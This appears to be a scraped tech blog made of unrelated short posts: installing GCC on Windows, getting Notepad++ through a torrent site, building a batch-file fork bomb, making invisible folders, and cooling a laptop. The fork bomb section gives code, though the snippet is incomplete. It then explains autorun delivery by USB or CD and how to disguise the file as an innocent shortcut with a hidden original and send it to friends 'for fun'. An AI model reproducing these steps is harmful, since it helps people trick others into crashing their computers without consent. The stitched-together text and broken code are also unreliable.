So are you bored of using the turbo C/Dev C compiler in windows? 

in this tutorial I will show you how you can install the GCC compiler in your windows platform which is basically provided by codeblocks. So, follow me step by step.

• First of all you need to download the gcc compiler provided by codeblocks. So click the download button below, and download the file.

• Now double click the installed file when your download is completed. Follow the procedures one by one and install it. Then check the steps below.

• When you are done installing then goto your C drive->open program files(x86)->Codeblocks->MinGW->bin . Then copy the address of the path as shown in the diagram.

• Now right click on your my computer/this pc and click properties.

• Here click on Advanced system settings boxed in the diagram and when the window open click on Environment variables..

• Now click on New... boxed in the diagram. Then type the variable name as Path and paste the address you copied earlier in the variable value section. Then press Oks and you are done installing the compiler.

Now, I will show you how to use the compiler. So open your notepad and type any C code. I have typed the easiest one to just show you. Then save your file with a name like example.c (make sure to put .c at the end). I have saved it on desktop.

Ok so I saved it with the name adispark.c 

Now open command prompt->then goto the directory where you have saved the file(for me it's desktop)

Now to compile your code type : gcc filename.c        (for me gcc adispark.c) and press ENTER

Now to run your if there are no error then type : a.exe   and press ENTER

See, it's working. Well, personally I don't like using notepad as an editor for programming. I use notepad++ which is a cross platform IDE and trust me when you code using that it really feels good. So, if you want to download notepad++ too then click below :

• After you press enter you will see many files there to be downloaded. Now here it's your instincts and experience that would work basically to check which is the best one. You can also decide checking the peers. Here I am downloading that 2 MB sized file just to show you. So lets just click it.

• Here too there are a few sites from where you can download. Now all of them should work but choose the one that has the best interface and for now kat.cr is that. So I click it and goto the website.

• Here you will see a download torrent button just click it and a .torrent extension file will get downloaded. Double click to open that file.

• When the file is open you will a pop-up window like this. Give the location where you want to download you desired file on the box at left top and press OK right down side. You download will start now and you can also see that.

 

• After your file is downloaded you will find it seeding. So just right click on it and press remove(press only remove don't press "remove and delete toreent+data" or something like that)

A Fork Bomb or Rabbit Virus is a program which can generate a large no of processes very quickly in order to overload the space available in the list of processes kept by Computer’s Operating System.

It works by spreading cmd.exe in Windows. It just generates cmd.exe again and again so quickly that even your alt+ctrl+del (Task Manager) will not work. Actually Task manager gets overlapped by executing of cmd.exe. It doesn’t allow the Operating System to generate Task Manager at that time.

# How to Create a Fork Bomb

Open notepad.
Type the Following code :

GOTO :s

• Save as ForkBomb.bat
• Your ForkBomb is Ready.
• You can Save it as ForkBomb.txt to view the Code as if you open that .bat file then fork bomb will start forking.
• Don’t click on the ForkBomb.bat file now if you want to see what happens next then your wish but I am not responsible for it.

Using Fork Bomb :

Making An Autorun ForkBomb:
       

Suppose you have created a fork bomb.It will be surely a .bat file as i have told you.Now place this .bat file in your pendrive/usb or in a cd/dvd with a autorun file(calling that .bat file).It means whenever the cd/dvd/pendrive/usb will open it will automatic call that .bat file(If the autorun feature is enabled).
       Now the question arise that how I am gonna create a autorun file which will call that .bat file which contains the form bomb programming. 
        

Steps to create the AUTORUN fIle:

• Open notepad.

• Type [autorun] at the first line.

• Type open = forkbomb.bat; (Instead of fork bomb it can be anything)

• Save it as autorun.inf
• Your autorun file is created which will call that .bat file.

The autorun file will look like this :

Now place it in Your Pendrive/usb/cd/dvd. Remember this will work whenever the autorun feature is enabled on that drive.Otherwise first make it enable and then run this.

Sending the Forkbomb to friends Via Network:(For Fun Only)

•  Put your forkbomb in a folder.
• Go to that folder and right click on your forkbomb file.
• Select "Create Shortcut".
• Now there should be a shortcut right next to that. Right click that shortcut and go into the properties.
• Go to the shortcut tab and click "Change Icon." There can be an error message, just ignore it.
• Change it to whatever you want the file to be.
• Rename the shortcut so that there is no "Shortcut to" at the beginning of the file name.
• Right click your original forkbomb file and go to properties.
•  Click on the hidden button.
• Press ok and go up to tools on the folder menu bar.
• Go to the view tab and look for the thing that says "Do not show hidden files and folders." Select that and press ok.
• Now send that file to your friend via any messenger service/chat service when he/she clicks on that and boob as the forkbomb virus is started.

• Select the folder you want to make invisible.
• Right click and click rename.
• Delete it's existing name and type Alt+(0160) from the num-pad and enter, so now you have a folder with no name.
• Right click again on the folder and open properties, go to customize and click change icon.

• In the icon section you basically have to select a black icon as you can see in the image there are 2. Select any of them and press ok. 

So, now you have your own invisible folder. Use it and store your data fearlessly :)

Well, if you ask why then basically we all have to ask microsoft. But a simple cause could be that you can't use those names that refers to any system actions. 

With a simple trick though you can always use this names, let me show you how :

• First create a new folder or delete the existing name of your test folder
• then type your desired name from those IMpossible names.
• after that type " Alt+(0160) " from the num pad and press enter.

See? there are no more error messages now.

Laptops are basically portable computer. There are both advantages and disadvantages of buying a laptop. The most common problem there is with a laptop is the over heating problem, and sometimes it even causes the graphics interface to burn(in extreme cases)

So got a new laptop or your existing one?

I will tell you 5 ways to keep your laptop cool and calm. :)

• Always place your laptop on a flat surface like a table, never place it raw on your bed or pillow. Always you have to make sure that air is passing through the cooling vents, which in most cases are below your laptop.
• If you are keeping your laptop on your bed make sure to place a book first then place it over that keeping the vent area unblocked.
• Buy a laptop cool pad if possible, or make your own with old computer fans(a bit of engineering is required :D )
• Always keep the drivers, specially the graphics drivers updated, and try to avoid playing intense games on your laptop. (If a gamer is reading this don't feel harsh just have an external graphics card installed in your laptop then go for it)  
• Last but not the least, try to clean the fans once in 3 months, just have a air gun or a vacuum cleaner. Turn it one then hold it near the cooling vents and all the places you seen open below the laptop. (If you don't do this dust will keep on growing in the fan area causing massive heating problems in future).
